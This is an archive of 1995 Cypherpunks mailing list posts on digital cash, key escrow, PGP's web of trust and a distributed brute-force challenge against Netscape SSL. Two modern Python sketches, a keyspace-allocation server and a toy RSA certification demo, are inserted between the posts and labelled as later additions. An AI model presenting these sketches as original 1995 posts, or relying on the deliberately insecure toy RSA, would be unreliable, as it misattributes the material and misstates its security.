interesting; ubiquitous computing, telecommuting, flattening organization
structures, and lots of other phenomena can be attributed here, and even
Mr. Archer's transaction-based tax proposal can. However, let's look at
what it does to book-entry, particularly in the presence of strongly
cryptographic certificate systems.

First, like Tim says, a book-entry system is bad for privacy.  The IRS
knows how much money you make, the bank knows how much you spend on your
credit card, another book-entry system, even your grocery store knows what
kind of food your cat likes. In a certificate system, like digital cash, no
one knows anything, and it's cheaper that way anyway. Who did what to whom
and for how much has no economic value whatever. No one can track the
origin of all the bits of cash going through the till, much less audit its
ownership trail, and cryptographic protocols allow the secure handling of
the money anyway, so the existence of the money speaks for itself, without
needing to know who gave it to you.  Book-entry stays where it belongs, on
the store's accounting system, and there's reason to believe that as
processors get cheaper and cheaper, there might be a micro economy
(ecology?) in the making in an enterprise's various economic units, as a
result of ubiquitous computing. Transfer payments have always been a vexing
problem in large businesses, because there's no way to arrive at a fair
price for intra-company trades of goods and services without looking to
some outside market price.  In fact, it's safe to say that the current
paradigm for financial analysis, the efficient market hypothesis and its
offspring, CAPM, Black-Scholes, etc., is a solution to the transfer pricing
problem which evolved into something infinitely more useful.

But let's take this idea of strong cryptography in a geodesic network to
another financial abstraction, the securities markets. What you get then is
a reversion to certificate based trading. You've gone back to the
Buttonwood tree, only you're now trading digital certificates on the net.
People announce their intention to trade, what they're willing to pay or
accept, and, when the trade is made, people trade certificates under a
strong cryptographic protocol, announce the price to the market, and walk
away.  People can "make markets" in securities by holding inventories and
simply posting their prices bid or asked, to buy or sell their inventory of
securities.  Notice I said people here.  What we're talking about is
behavior which was originally done by *people* with *certificates*, and
then by ever-larger *institutions* with *book-entry*.  That is, until the
advent of computers, when the pendulum swung back toward smaller entities.
After all, in 1972, anyone with the money could get a Quotron or a NASDAQ
Level 3 machine, and soon, at least the sell side of the market was
competitive again. The stodgy old firms like Morgan Stanley and Salomon had
to turn into very efficient carnivores to survive.  Paradoxically, the buy
side of the market, composed of banks, pensions, and mutual funds, had its
development arrested by regulation and is just approaching the centralizing
phase.  However, we now know that the operation of both the buy and sell
sides of the capital markets are going to get very interesting very soon,
right?

With a geodesic, certificate-based financial system, the economies of scale
caused by hierarchical communications systems go out the window. There is
no need to concentrate processing power to be used on the
market's information, because the information is everywhere without having
to concentrate it.  What's more, the specialization of processing enabled
by Moore's Law creates such a flood of information that no centralized
entity can process it all, and so it collapses under its own weight.

Everyone trusts their transactions because of the difficulty of forging
certificates.  That means that once again, a certificate has its own
inherent worth. It speaks for itself, and when it changes hands, the trade
is, as Eric Hughes says, "immediately and finally" cleared and settled.
The overhead of keeping books is gone, at least for the trading parties,
and especially for the clearing houses, who, like exchanges, just kind of
disappear, along with any way to regulate them.  Somewhere, Joe Kennedy,
the first Chairman of the Securities and Exchange Commission, is probably
either crying his eyes out or laughing his head off, depending on your
interpretation of his role in regulatory history.

This brings us to the reason securities exist, anyway.  A stock certificate
is really a legal document, right?  How can you enforce laws in a geodesic
environment protected by strong cryptography?  Well, in a geodesic market,
cryptographic protocols, instead of laws, enforce agreements.  If the
cryptographic protocol isn't satisfied, the software won't work.  It's easy
to see how a combination of certification technology and cryptographically
anonymous voting protocols allow the direct election of a company's board
members without proxies -- another hierarchical device -- for instance.
It's easy to see how the presentation of digital interest coupons to a
company's bond trustee could result in a payment in digital cash.  This
seems to work for just about any kind of financial instrument you could
imagine.  The presence of the digital certificate is prima facie claim upon
the abstracted item, votes, interest/dividends, hog bellies, you name it,
and the protocol could be put into software everyone could check
themselves.

Obviously, we aren't talking about the end of bookkeeping as we know it
(BAWKI? ;-), but it does mean that days of book-entry as a means of social
control are numbered.

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 22 Aug 95 09:39:04 PDT
To: cypherpunks@toad.com
Subject: Re: True Names and Webs of Trust
Message-ID: <9508221638.AA26842@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> This has relevance to the thread Michael Froomkin raised, as well. To wit,
> none of the people I've met has been "certified." And yet it doesn't bother
> me.

Just because you haven't been able to easily do it yet, nor found it useful,
is no reason not to let new technology provide this service to you.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 22 Aug 95 12:38:06 PDT
To: ecm@ai.mit.edu
Subject: Re: C$ prize for bruting Hal's next challenge?
Message-ID: <v02120d0cac5ff051dc4e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:50 8/22/95, aba@atlas.ex.ac.uk wrote:

>I hereby donate c$ 50 to the pot, mail me your c$.  (It won't be a
>good idea if you post your c$ to the lists, as the first person to
>cash it gets it, you need to do it in private email, PGP it even).  To
>generate your payment either save it to a file, or email directly to
>me via the digicash client, click on the icon which looks like a note
>(is that what it's supposed to be? the one next to the bank symbol),
>then choose to send via file / email toggle make payment, enter the
>amount (leave the shop account ID blank, give a payment description if
>you like).

I like the idea, but there are two problems with it:
-Not all platforms let you save e$ to a file. You got to open a shop.
-Leaving the shop ID blank won't work. You got to use @ (wildcard) for shop
ID to turn e$ into a bearer certificate.

Get the shop going and I'll donate e$50


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@l0pht.com>
Date: Tue, 22 Aug 95 09:56:33 PDT
To: cypherpunks@toad.com
Subject: Returned mail: unknown mailer error 126
Message-ID: <199508221645.MAA24957@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 22 Aug 1995 12:45:26 -0400
from localhost [127.0.0.1]

   ----- The following addresses had delivery problems -----
"|/home/gheap/\+\ \+\ \# -vo /home/gheap/.elm/gheapfilter.log"  (unrecoverable error)
    (expanded from: gheap)

   ----- Transcript of session follows -----
sh: /home/gheap/+: No such file or directory
554 "|/home/gheap/\+\ \+\ \# -vo /home/gheap/.elm/gheapfilter.log"... unknown mailer error 126

   ----- Original message follows -----


To: cypherpunks@toad.com
From: cypherpunks@toad.com
Date: Tue, 22 Aug 1995 12:45:26 -0400

blah




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Tue, 22 Aug 95 09:56:38 PDT
To: poodge@econ.Berkeley.EDU (Sam Quigley)
Subject: Re: DES & RC4-48 Challenges
In-Reply-To: <199508221626.JAA10063@quesnay.Berkeley.EDU>
Message-ID: <199508221656.MAA14641@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue Aug 22 12:26:49 1995: you scribbled...
> 
> 
> [stuff about running crypto screensavers]
> 
> It seems like there's got to be an easy way to divvy up keyspace on a
> real time basis so that anyone with a few cycles to spare can
> contribute them...
> 
> There could be a central server out there, which would keep track of
> what keyspace needs to be swept, etc.

It seems that the SKSP protocol is a good foundation for just such a plan.

Can screensavers such as After Dark for mac/pc access network protocols?
Or would someone have to write a new screensaver altogether?

...alex...
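
The central keyspace server suggested in the quoted text above, as an added Python sketch that is not part of either poster's message and is not an implementation of SKSP (whose message format does not appear here). The class, method and worker names and the lease timeout are assumptions; the point shown is that leases must expire so a range taken by a vanished worker is swept by someone else.

```python
"""Constructed sketch of a central keyspace allocator with expiring leases."""


class KeyspaceServer:
    def __init__(self, key_bits, segment_bits, lease_seconds):
        self.segment_size = 1 << segment_bits
        self.total_segments = 1 << (key_bits - segment_bits)
        self.lease_seconds = lease_seconds
        self.next_fresh = 0      # lowest segment never handed out
        self.leases = {}         # segment -> (worker, expiry time)
        self.swept = set()       # segments reported fully searched
        self.found_key = None

    def _bounds(self, segment):
        first = segment * self.segment_size
        return first, first + self.segment_size - 1

    def allocate(self, worker, now):
        """Return (segment, first_key, last_key), or None if nothing can be issued."""
        if self.found_key is not None:
            return None
        # Re-issue expired leases before fresh ranges, oldest first,
        # so a range abandoned by a worker is not silently skipped.
        expired = [s for s, (_, exp) in self.leases.items() if exp <= now]
        if expired:
            segment = min(expired, key=lambda s: self.leases[s][1])
        elif self.next_fresh < self.total_segments:
            segment = self.next_fresh
            self.next_fresh += 1
        else:
            return None          # everything is swept or under a live lease
        self.leases[segment] = (worker, now + self.lease_seconds)
        return (segment, *self._bounds(segment))

    def report(self, worker, segment, found_key=None):
        """Record a finished segment; False means the report was not accepted.

        Only the current lease holder may report, and a claimed key must lie
        inside the segment. A worker that reports "swept" without searching
        is NOT detected by this sketch.
        """
        lease = self.leases.get(segment)
        if lease is None or lease[0] != worker:
            return False
        first, last = self._bounds(segment)
        if found_key is not None and not first <= found_key <= last:
            return False
        del self.leases[segment]
        self.swept.add(segment)
        if found_key is not None:
            self.found_key = found_key
        return True


def sweep(first, last, is_key):
    """Stand-in for a worker's trial-decryption loop over one segment."""
    for candidate in range(first, last + 1):
        if is_key(candidate):
            return candidate
    return None


def demo():
    secret = 0x1ABC   # constructed key; it lies in segment 1 (0x1000-0x1FFF)
    srv = KeyspaceServer(key_bits=16, segment_bits=12, lease_seconds=3600)
    now, order = 0, []
    job = srv.allocate("fast", now)    # segment 0
    srv.allocate("flaky", now)         # segment 1, then this worker vanishes
    while job is not None:
        segment, first, last = job
        order.append(segment)
        hit = sweep(first, last, lambda k: k == secret)
        now += 600                     # constructed: ten minutes per segment
        srv.report("fast", segment, found_key=hit)
        job = srv.allocate("fast", now)
    late = srv.report("flaky", 1)      # stale report after the range was re-issued
    return {"found": srv.found_key, "order": order,
            "late_report_accepted": late, "swept": len(srv.swept)}


if __name__ == "__main__":
    print(demo())
```
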



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 22 Aug 95 11:25:11 PDT
To: cypherpunks@toad.com
Subject: Re: Partial Key Escrow
Message-ID: <199508221820.OAA26418@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Lyle Seaman <lws+@transarc.com> wrote:

<snip>

>The domestic TLA can't afford to embark on massive, wholesale fixing
>expeditions this way, even _with_ the escrowed part.  The point is to
>fix the unescrowed part at such a size that they can afford to crack a
>limited number of keys in a reasonable interval.  Say, at a cost of
>about $10000 / key.  That's peanuts for an OKBomb or WTC bomb case,
>but it gets to be expensive (hard to hide the expense) if you're
>fishing for dirt on members of the opposition party,...

The problem for THIS member of an opposition party is that the
percentage of the U.S. budget comprising "Black" (secret, "off
the books" usually mil./intelligence) programs grows yearly,
like inflation. At the same time, the speed of chips increases
like the national debt and their cost goes down steadily, (see
Robert Hettinga's post titled, "e$: The Book-Entry/Certificate
Distinction" describing Moore's law). These trends, (IMO) bode
ill for my long-term personal (and political!) privacy, unless
the freedom of those of you able to "write code"(tm) implement-
ing my privacy is unfettered. Anything that reacts as slowly to
the marketplace as the government does will constantly be play-
ing catch-up. Others may disagree, depending on your individual
level of trust in the present government.

<snip>

...

On a different, and sad, note...Phil Zimmermann's mom recently
passed away. I encourage all of you to make a donation in her
name to his legal defense fund, and (if religious) to include
her in your prayers.
Peace.
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMDofYm1lp8bpvW01AQEoPQP+JiQHUke0Q/nDdXgt9NIMPbePp5T8dqyn
YL5TdWchPCqZ+aaBfbO20/dLADz/C8L7zq88bLLsUaVWr8tArlZPh2keQvOVUWvd
PD+/Ky4HsRn7BJaBuc5187gvAtqyvWGAHpYJQ/QilC7cUqDmbCiuBHCD2rsSyj1E
XX2Cl1tBnd8=
=L5O9
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"The important thing is not to stop questioning. Curiosity has its
own reason for existing. One cannot help but be in awe when he
contemplates the mysteries of eternity, of life, of the marvelous
structures of reality. It is enough if one merely tries to comprehend
a little of this mystery every day. Never lose a holy curiosity."
 -- Albert Einstein
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDof2SoZzwIn1bdtAQGacwGAmM50nkIDJvU6i8PApdwtZ5oG1vIN7Nv0
zLZloPP4+6FR3R9vkYun5Ptq7yEARTqU
=UuAX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 22 Aug 95 13:43:17 PDT
To: patl@lcs.mit.edu
Subject: Re: True Names and Webs of Trust
In-Reply-To: <199508221446.KAA00931@skyclad.lcs.mit.edu>
Message-ID: <199508222043.OAA17349@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> Key signatures exist for one reason and one reason only: To thwart
> man-in-the-middle attacks.  Whether your "persistent persona" is a
> True Name (tm) or a pseudonym is irrelevant.

<snip>

> Zimmermann clearly understood all of this, but I don't think he
> documented it properly.  In my opinion, everyone should always think
> in terms of man-in-the-middle attacks when signing a public key.
> Mandating "True Names" is just an overconservative approach suitable
> for people who don't fully understand the issue.


My point exactly.  My post "Stop Fixating on True Names" was an attempt to
clarify things to said people.


Look at it this way:  leaving aside the fact that a Man-In-The-Middle has to
do a little more fast footwork than a normal old eavesdropper does, public
key cryptography does not actually give you *any* advantage over symmetric-key
cryptography except for this one fact:


You can ask George what Alice's public key is, but you can't ask him what
her-and-your shared (symmetric) secret key is!


- From this perspective, the Web of Trust is the soul of public-key
cryptography.  From the other perspective ("Never ever sign a key which you
got off of a bulletin board!" warns "pgpdoc1.txt") it is a cute anachronism.


By the way, you mentioned "people who don't fully understand the issue"--
a brief survey of e-mail and posts I have seen on this subject indicates to
me that even knowledgeable people like the cypherpunks are about evenly split
on whether they appreciate this concept or not.


[note:  I've been cc:'ing messages to c'punks accidentally after I upgraded
to mh.  My apologies.  At least they weren't completely without
relevance...]


Bryce
Announcement: I have had technical difficulties.  If you sent me e-mail
between Aug 5 and Aug 20 and didn't receive a response, please re-send.
signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMDpBPfWZSllhfG25AQFvuAP/a6vSu4OgkDAXTRWif46/chb1+Owo2TBx
YEWSzp4PRYTL1ZwrC1eOtx37miGUzvsGooXOEPfEpC4oW3f0Jg6BHanXabhegJyb
t09m8IlaeD38IKATnzcC7VeeU0sWuWUea1vFJw28oZv0VOgGSeeFcYE4DA/oOtRD
oqTFfG+GM7w=
=LFIz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: syrinx@c2.org (Syrinx Anonymous Remailer)
Date: Tue, 22 Aug 95 15:07:56 PDT
To: cypherpunks@toad.com
Subject: URGENT ANOTHER SCIENTOLOGY RAID: FACTNET
Message-ID: <199508222202.PAA23454@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


FORWARDED FROM: alt.religion.scientology

Believe it or not, Co$ has just struck again!

I just talked with Lawrence Wollersheim of FACTNet in Golden, Colorado. As
I type (10:20 a.m. PDT), Federal marshals are looking on as Co$ goons grab
all of FACTNet's computers, records, archives, and on and on.

Look for more information shortly.

Please post this EVERYWHERE. Get the word out!

--------------------------------------------------------

A special note to T.C. May:

These are nice people, eh. Three raids for posting unsealed court 
documents. Get a clue Tim!
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 22 Aug 95 12:11:19 PDT
To: cypherpunks@toad.com
Subject: Re: NEXT CHALLENGE: so, when does it start?
Message-ID: <9508221911.AA16633@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, I've got the program, and I'm ready to start sweeping
(about 35,600 keys/sec on a P5  90 Mhz NT machine - have to see
how many I can draft for this) - I even compiled for Win 3.11 (less
than 800 keys/sec on a 486/33 - don't think I'll bother).

I've got the challenge file from Adam's messages.

But when do we start? Have we started already? Have we completed?

It's difficult to tell. There was talk of starting at 12:00GMT (about 6 
AM here on the east coast), but there was no 'start now' message to 
the list. At Adam's site, I can see that 'project 11fa' has been 
completed, but the key (000000001234) looks like test data.

If I try to allocate keys, I get the 600 SLEEP 3600 message, which
suggests strongly that the search has not started yet.

Adam, when you fix a time to start the search, could you:

1. Send a message to the list, clearly saying so, and giving the 
time.

2. Put a <h1>headline</h1> in your page saying it's underway?

Thanks.




Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Tue, 22 Aug 95 17:44:17 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Third World Man
Message-ID: <8AFA46B.0003000359.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


TC> When a certain character in a television show referred to "Third World
TC> mutants," he was also referring to "your basic brown types." (His words,
TC> not mine. Ten credits to anyone who can identify the t.v. show and the
TC> character.)

  "Hill Street Blues", Lt. Howard Hunter.

TC> The term "Fourth World" has in the last 20 years come to refer to the
TC> countries which are so impoverished as to be almost hopeless. Bangla Desh
TC> is the canonical Fourth World nation.

  Cyberia is the "Fifth World", akin to the "Fifth Dimension". Let the
sun shine....


 * I love my country.
 * I fear my government.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 22 Aug 95 18:24:16 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Third World Man
Message-ID: <ac5fd1e2240210040198@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 PM 8/22/95, MONTY HARDER wrote:
>TC> When a certain character in a television show referred to "Third World
>TC> mutants," he was also referring to "your basic brown types." (His words,
>TC> not mine. Ten credits to anyone who can identify the t.v. show and the
>TC> character.)
>
>  "Hill Street Blues", Lt. Howard Hunter.

Congratulations!

Two other people said "Archie Bunker"/"All in the Family." A good guess,
but it was indeed Howard.

>TC> The term "Fourth World" has in the last 20 years come to refer to the
>TC> countries which are so impoverished as to be almost hopeless. Bangla Desh
>TC> is the canonical Fourth World nation.
>
>  Cyberia is the "Fifth World", akin to the "Fifth Dimension". Let the
>sun shine....

The dawning of the age of Aquarius?

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@eiffel.lcs.mit.edu>
Date: Tue, 22 Aug 95 16:17:39 PDT
To: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Subject: Re: True Names and Webs of Trust
In-Reply-To: <199508221446.KAA00931@skyclad.lcs.mit.edu>
Message-ID: <199508222317.TAA09558@eiffel.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 >> Zimmermann clearly understood all of this, but I don't think he
 >> documented it properly.  In my opinion, everyone should always
 >> think in terms of man-in-the-middle attacks when signing a public
 >> key.  Mandating "True Names" is just an overconservative approach
 >> suitable for people who don't fully understand the issue.

 wilcoxb> My point exactly.  My post "Stop Fixating on True Names" was
 wilcoxb> an attempt to clarify things to said people.

Then you didn't clarify very well; to wit:

 wilcoxb> Okay now does anyone want to do any of the above two things
 wilcoxb> to me?  If not then *don't* *worry* about whether my public
 wilcoxb> key is signed by anyone or not.  It makes zero difference to
 wilcoxb> you until such a time as one of the above motivations
 wilcoxb> acquires.

 wilcoxb> Zimmermann et al. were/are naive to emphasize the Web of
 wilcoxb> Trust as a means of introducing strangers.

The first paragraph clarifies nothing because it is dead wrong; the
second because it is arrogant, offensive, and dead wrong.

 wilcoxb> From this perspective, the Web of Trust is the soul of
 wilcoxb> public-key cryptography.  From the other perspective ("Never
 wilcoxb> ever sign a key which you got off of a bulletin board!"
 wilcoxb> warns "pgpdoc1.txt") it is a cute anachronism.

The Web of Trust is a means of thwarting active attacks;
nothing more, nothing less.  "Perspective" has nothing to do with it.

Given that active attacks are hard to explain and understand fully,
the PGP docs are correct to advocate a conservative approach to
signing keys.  Novices *should* be taught to take the Web of Trust
seriously.  (Yes, I am retracting my own statements quoted above; the
more I think about it, the more I think it is very hard to teach a
novice the details of active attacks.)

Moreover, I suspect that active attacks are more likely today than
when those docs were written, which makes their advice precisely the
opposite of an "anachronism".

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMDpleHr7ES8bepftAQE0KgQAoAg5QeXwbtZzKMliNH63f3Ewvxz1g8gR
vlTPwZ8YRWANxFFbhN03DMo6HQI78f/8VnbvOB8osZz/aLQgmyuw6Q201vfHbbtu
gKpfLBPLu/Cl2JEk6FK58IYyvrTPZ7XKfp80LoRIby/pSU2uL7K2+7vfjGWGvjvY
V9s9mJUCGN8=
=OBD5
-----END PGP SIGNATURE-----
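
The point argued in this thread, that a key signature binds a persistent persona (True Name or pseudonym) to a key so that an active attacker cannot substitute his own, as an added Python example that is not part of any poster's message. It uses toy textbook RSA over fixed Mersenne primes purely so it runs with the standard library; the key sizes, persona name and function names are assumptions and nothing here is PGP's actual format.

```python
"""Constructed illustration: an introducer's signature defeats key substitution."""
import hashlib


def mersenne(k):
    return (1 << k) - 1   # prime for the exponents used below


def make_key(p, q, e=65537):
    """Toy textbook-RSA key pair from two fixed primes (insecure, illustration only)."""
    n = p * q
    return {"pub": (n, e), "d": pow(e, -1, (p - 1) * (q - 1))}


def _digest(message, n):
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(key, message):
    n, _ = key["pub"]
    return pow(_digest(message, n), key["d"], n)


def verify(pub, message, signature):
    n, e = pub
    return pow(signature, e, n) == _digest(message, n)


def binding(persona, pub):
    """What an introducer certifies: 'this key belongs to this persona'."""
    return f"{persona}|{pub[0]}|{pub[1]}".encode()


def certify(introducer_name, introducer_key, persona, pub):
    return {"by": introducer_name,
            "sig": sign(introducer_key, binding(persona, pub))}


def accept_key(persona, pub, certs, trusted):
    """Accept a key that arrived over an untrusted channel only if an introducer
    whose key we already hold has certified this exact (persona, key) binding."""
    for cert in certs:
        introducer_pub = trusted.get(cert["by"])
        if introducer_pub and verify(introducer_pub, binding(persona, pub), cert["sig"]):
            return True
    return False


GEORGE = make_key(mersenne(89), mersenne(107))    # the introducer
ALICE = make_key(mersenne(61), mersenne(127))     # the real correspondent
MALLORY = make_key(mersenne(31), mersenne(521))   # the man in the middle
PERSONA = "alice-the-pseudonym"                   # no True Name required


def demo():
    trusted = {"george": GEORGE["pub"]}           # George's key, obtained out of band
    cert = certify("george", GEORGE, PERSONA, ALICE["pub"])
    genuine = accept_key(PERSONA, ALICE["pub"], [cert], trusted)
    # Key swapped in transit, George's real certificate replayed alongside it.
    replayed = accept_key(PERSONA, MALLORY["pub"], [cert], trusted)
    # Certificate labelled "george" but made with the attacker's own key.
    fake = certify("george", MALLORY, PERSONA, MALLORY["pub"])
    forged = accept_key(PERSONA, MALLORY["pub"], [fake], trusted)
    # No certificate at all: the key cannot be distinguished from a substitute.
    bare = accept_key(PERSONA, ALICE["pub"], [], trusted)
    return genuine, replayed, forged, bare


if __name__ == "__main__":
    print(demo())
```
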




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 22 Aug 95 11:52:46 PDT
To: ecm@ai.mit.edu
Subject: C$ prize for bruting Hal's next challenge?
Message-ID: <1792.9508221850@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



It has been suggested to me that we might like to add a fun incentive
to the bruting of Hal's 2nd SSL challenge as posted to cypherpunks on
Aug 19th.

To this end we need some c$ for the pot!

I'll be collecting donations for the pot and vouch that every c$ cent
handed over will be handed to the person who hits the key.

The only receiver of the jackpot for hitting the key will be
encouraged to cash it in on the ecm mailing list / ecash market WWW

	ecm@ai.mit.edu, http://www.c2.org/~mark/ecash/ecash.html

so that currency is not taken out of circulation, and to help boost
the flow of c$ for the ecash market, as there appears to be a shortage
of e$ sellers.

For info on joining in the lottery for a chance to win your c$ back
and then some, or just to win other people's c$, take a look at:

	http://www.brute.cl.cam.ac.uk/brute/

The challenge has not started yet, that will probably not be for a day
or two yet, so you've got time to get the software, check that it
works etc.

Then stand by... for "the ready, steady, go!".

The reason for the start line affair is that for demonstrational
reasons this attempt is designed to show how quickly a Netscape SSL
session can be cracked.

There is a WWW interface to getting key space for those behind
firewalls or without direct IP.

I hereby donate c$ 50 to the pot, mail me your c$.  (It won't be a
good idea if you post your c$ to the lists, as the first person to
cash it gets it, you need to do it in private email, PGP it even).  To
generate your payment either save it to a file, or email directly to
me via the digicash client, click on the icon which looks like a note
(is that what it's supposed to be? the one next to the bank symbol),
then choose to send via file / email toggle make payment, enter the
amount (leave the shop account ID blank, give a payment description if
you like).

Adam

[btw is there still something wrong with toad.com? traffic seems
exceptionally light...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul.elliott@hrnowl.lonestar.org (Paul Elliott)
Date: Wed, 23 Aug 95 00:22:05 PDT
Subject: CypherRant: Reasons why private cryptography should not be regulated.
Message-ID: <303ac1bd.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

CypherRant: Reasons why private cryptography should not be regulated.

Paul Elliott is solely responsible for this document.
Please distribute widely.


FBI director Freeh has been going around pushing his stupid plans
for cryptography regulation. Usually, these plans take the form of
some kind of mandatory key escrow. Mandatory key escrow schemes
are requirements that encryption keys be given to government agencies
with the promise that the keys will not be used without a warrant.

Now let me give some reasons why Freeh's requests should be ignored.

1) It is unconstitutional!
	a) First amendment. Electronic communications are a form
                of speech and the cryptography regulations try to regulate
                this speech to a form the government understands.
                Congress shall make  NO LAW ....or abridging the
		freedom of speech or of the press; ... 
		They really meant it!
	b) Second amendment. Cryptography is arms. Even U.S.
                government ITAR regulations admit this. Therefore
                cryptography is protected by Second amendment.
	c) Ninth & tenth amendments. Article I section 8 does not
                give congress the power to tell us what computer
                software we can run on our computers. Therefore
                that power remains with us, and we should be able
                to run whatever cryptography software we want the 
                displeasure of congress notwithstanding.

	d) The power to search, if a warrant exists, which is mentioned by
		the fourth amendment, does not grant the government the 
		right to succeed in finding what it is looking for. 
		In other words the power to search, is not a power to 
		guarantee a successful search. It is not a power to 
		require citizens to run their lives in such a manner 
		that any government search will be successful. For 
		more information on this, see the following World Wide 
		Web url: http://www.clark.net/pub/cme/html/avss.html

Since all Senators and Congressmen take an oath to preserve and defend
the constitution of the U.S., this should be the end of the argument.
However, watching some of the stupid laws that have come out of congress
in past years, tells me I should supplement the above with additional
argument.

I am not a lawyer and I am not trying to be one. I have no opinion as to
whether private cryptography regulations will be found unconstitutional.
There are a number of cases where our courts have made decisions which
do great violence to the plain meaning of the text of our constitution.
Knowing what the courts will actually do is the business of lawyers.
Understanding the constitution so that one may know what the courts 
should do should be the business of every citizen.

2) The excellent NRA argument "when guns are outlawed only outlaws
will have guns" applies with equal force to cryptography! Professional
criminals will circumvent with ease any government regulations on
cryptography. Billions of bytes travel the internet yearly. The techniques
of steganography make it absolutely trivial for any motivated person to 
conceal any encrypted messages. The Big Brother cryptography regulations
will affect only ordinary citizens.

3) Cryptography is already in use by legitimate business. Any government
regulation of cryptography will probably cost huge amounts of money for
software and hardware costs for existing systems to be changed to a form
that the government approves. The existing ITAR regulations probably
cost the U.S. economy large amounts of money because U.S. companies can
not market cryptography software internationally. By discouraging
private cryptography, the ITAR regulations probably enable a large
amount of computer crime since it makes it difficult for people to
protect themselves. The ITAR regulations have not prevented, and cannot
prevent, strong cryptography from making it outside the U.S. How many tons of
cocaine illegally enter the U.S. every year? Yet the government ITAR
regulations propose to regulate the export of software that can fit in a
shirt pocket, or travel by wire concealed with  billions of bytes of
data that leave the U.S. every year. It is time for the U.S. government
to start living in the real world!

According to an article in the August 17, 1995 Wall Street Journal, ITAR
regulations have required Netscape to use inferior encryption methods in
the international version of its World Wide Web browser software. This
inferior encryption method has actually been broken by a French Hacker!
Because of its computational intensity, this weakness in the encryption
method does not represent an immediate danger. However as more powerful
computers continue to develop, this and similar vulnerabilities will
present a danger for those who wish to use the internet for commerce.

4) These regulations make it impossible for an individual to have
greater privacy than the U.S. government. The Aldrich Ames case makes it
clear that the U.S. is incompetent to keep a secret. 

5) The proposed regulations require the American people to trust the
government, but on the contrary, the government should be required to
trust the American people. Recent news stories (Waco etc.) make it
clear that it is common for government agents to lie to get search
